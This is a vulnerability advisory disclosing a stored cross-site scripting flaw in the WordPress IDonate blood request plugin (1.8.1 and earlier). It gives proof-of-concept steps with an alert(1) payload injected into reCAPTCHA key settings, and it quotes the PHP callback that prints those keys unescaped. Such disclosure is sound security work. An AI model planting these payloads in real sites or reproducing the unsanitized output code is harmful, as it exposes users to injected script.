WordPress IDonate Blood Request Management System 1.8.1 Cross Site Scripting

`# Exploit Title: IDonate – blood request management system <=1.8.1 - Stored  
Cross-Site Scripting (Authenticated)  
# Date: 29-02-2024  
# Exploit Author: Laburity Research Team  
# Vendor Homepage: https://wordpress.org/plugins/idonate/  
# Version: <=1.8.1  
# Tested on: Firefox  
# Contact me: contact [at] laburity.com  
  
# Summary:  
  
A cross site scripting stored vulnerability has been identified in  
WordPress Plugin IDonate – blood request management system version less  
then 1.8.1. that allows Authenticated users to run arbitrary javascript  
code inside WordPress using blood request management system Plugin.  
  
# POC  
  
1- Navigate to  
http://localhost:10003/wp-admin/admin.php?page=idonate-setting-admin  
2- Enter payload "><h1 onclick=alert(1)>XSS</h1> in Recaptcha secret key  
and in Recaptcha Site key  
3- Click on save changes.  
4- While clicking on the payload text, XSS will trigger.  
  
  
# Vulnerable Code:  
  
```  
public function idonate_recaptcha_secretkey_callback()  
{  
  
if( isset( $this->general_options['idonate_recaptcha_secretkey'] ) ){  
$secretkey = $this->general_options['idonate_recaptcha_secretkey'];  
}else{  
$secretkey = '';  
}  
  
//  
printf(  
'<input type="text" id="idonate_recaptcha_secretkey" value="%s"  
name="idonate_general_option_name[idonate_recaptcha_secretkey]" />',  
$secretkey  
);  
  
}  
```  
  
Secrets keys (idonate_recaptcha_secretkey) are printed without sanitization.  
`